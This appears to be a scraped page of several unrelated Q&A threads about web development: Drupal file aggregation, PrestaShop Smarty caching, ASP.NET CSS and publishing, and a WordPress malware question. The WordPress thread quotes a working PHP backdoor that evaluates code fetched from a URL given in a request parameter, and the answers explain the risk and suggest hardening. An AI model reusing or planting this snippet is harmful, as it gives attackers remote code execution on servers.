I started getting errors after I turned on Drupal's performance improvements which pack all the CSS and JS files into single files. The error looks like this:
The selected file /tmp/fileO4fjBF
could not be uploaded, because the
destination
js/js_8a69e612be02242c2866a4a19223bd12.js
is not properly configured.
I'm not sure how I should configure my server for this to work correctly. There is nothing in the documentation about this.
Check you ' Site Configuration > Files' settings or the report. If it is a file permission issue (or maybe a missing folder) it should be apparent from one of those two places.
Often the report or files-settings also supply information on how to remedy the problem.
Related
I have been looking at the Wordfence scan results on my site this morning and see 17 instances which seem to imply malware has ben installed on the server. I would be surprised if this were to be the case but wanted to be sure:
One example,
Filename: wp-admin/menu-header-cron.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php\x0aif (isset($_GET['limit'])) {\x0a eval(file_get_contents('http://' . $_GET['limit']));\x0a}
The issue type is: Backdoor:PHP/numeric.rce.8527
Description: Remote code execution malware
Looking at the file in question, the content of this file is:
<?php
if (isset($_GET['limit'])) {
eval(file_get_contents('http://' . $_GET['limit']));
}
Can anyone confirm whether this is an innocent file or something I need to quarantine/delete?
Also, has was this file created? It implies that remote code has the capability of creating new files in the wp-admin/ sub folder? Is there not a simple way to prevent this which would preclude any further instances.
Many thanks for any input
Answers:
Yes, this is a dangerous file as already mentioned by #Everlyn Woodley. eval() is not considered safe in production at all.
Further to verify, a quick grep "isset($_GET['limit'])" on source file of latest Wordpress package tells that its not part of it, hence again a dangerous code.
Yes, someone is able to upload files on your server. Probably they have uploaded some kind of web-shell and can manipulate any file on your hosting account. Its pretty common though.
To prevent it in future (given that you have successfully cleaned your current WP install), you can do few things, (there are plenty of articles so it would be redundant) but mentioning few might not hurt here:
Install or enable mod_security on server level
Always make sure you have latest Wordpress as well plugins
Use minimal plugins.
Simple but effective: Change location of wp-plugin and theme folders.
(https://wordpress.org/support/article/editing-wp-config-php/#moving-wp-content-folder )
If you examine access log of a regular WP install, you will notice that there are tons of bots hitting with known-vulnerabilities mostly targeting plugins folder, simply changing plugins folder location along with other security measures mentioned above can significantly reduce such hacks.
That snippet is reading the limit parameter then passing is as an URL to get a file. And eval function will just execute it
So its pretty dangerous
I'm working on a Prestashop site and recently noticed about the SMARTY features (Menu: Advanced > Performance).
I realized that in order to show changes I made in the css, I must select one of the last two options (first one was selected by default).
Screenshot (I'm sorry the site is in Spanish)
1)Never recompile template files
2)Recompile templates when files are modified
3)Force compilation
My question is: when it comes to an online shop, wich option should I select until I finish editing the code? What's the difference between both?
It may take me a couple weeks to finish the job and I don't want to mess anything up.
Thank you guys.
When you're starting to dev onto the shop, whether it's front or back, you may have to choose the option to recompile when files are modified. I'm always choosing this option because it allows me to develop or debug some files and the server keeps serving cache files to the visitors.
Also you may have to edit the file defines.inc.php file in the config folder in order to define the _PS_MODE_DEV to true, for example like this :
/* Debug only */
if (!defined('_PS_MODE_DEV_'))
if (in_array($_SERVER['REMOTE_ADDR'], array('217.128.240.59')))
define('_PS_MODE_DEV_', true);
else
define('_PS_MODE_DEV_', false);
Doing this so you'll be able to get some logs when you're updating something. Placing your IP into the array keeps everyone safe from seeing the logs (notices for example).
In PS 1.6.
- Configure the SMARTY to "Recompile templates if the files have been updated" then deactivate the option "Smart cache for CSS"
- make the changes in your CSS files,
- delete the folders mentioned sadlyblue in comment.
- and activate again the "Smart cache for CSS" SAVE to recompile theme.
I add a style sheet file to my project for customized style sheets. this file is in this path: ~/Content/MyStyle.css
When I run my project this file exists in the browser but there isn't any code in it.
Even I append my codes to Site.css file, those codes are wrote by mvc as default are exist, but those codes I added is not exist.
I'm confused. I wrote some code but not appear in browser.
Can you help me?
thanks
This is most likely a caching issue. You have to hard-refresh your browser. Try pressing ctrl+shift+R or ctrl+F5.
This will make sure that your modified files are requested from the server.
You can also change caching settings for your local development environment. Refer to MSDN on how to make a web.debug.config config transformation and what settings to change.
It is my first experience with asp.net. I have some large dll in my bin that never change and I would like to exclude them from publishing every time I make small changes to the pages. I know I need to add a section in my web.config but I do not know where and what to write in it to exclude the bin folder.
I already looked at few similar question on SO but none of them are really giving a clear answer to my need.
This is my web.config in which I have already added successfully the connection string for the production server and the error mode to have some feedback about errors during deployement phase.
Few lines of code to direct me on what to change will be appreciated.
To exclude any file from being copied; you can control this behavior by adding that file to your project; Once you add that file, you will see it in your Solution Explorer Right click on file and choose Properties . On the property page there is a Property called 'Copy to Output Directory' use that.
I need to know if it recompiles my site at all or if there are any issues doing this. I have tested the changes locally and in a test environment and I don't want to do a full deployment for one tiny change. I'm just not familiar with aspx.vb files and how they interact with a website.
The short answer is yes, it will cause the page to be dynamically recompiled. Dependencies could cause the entire site to be recompiled.
For more information read this MSDN article: Understanding ASP.NET Dynamic Compilation. The "Recompiling on Change" section addresses your question.
You can modify an .aspx.vb file and drop it into its respective location on the server, overwriting the existing file, and it will be dynamically compiled due to the change. However, if you were referring to having code that changed .vb file content on the fly, that sounds like a bad idea and you should reconsider your problem and approach.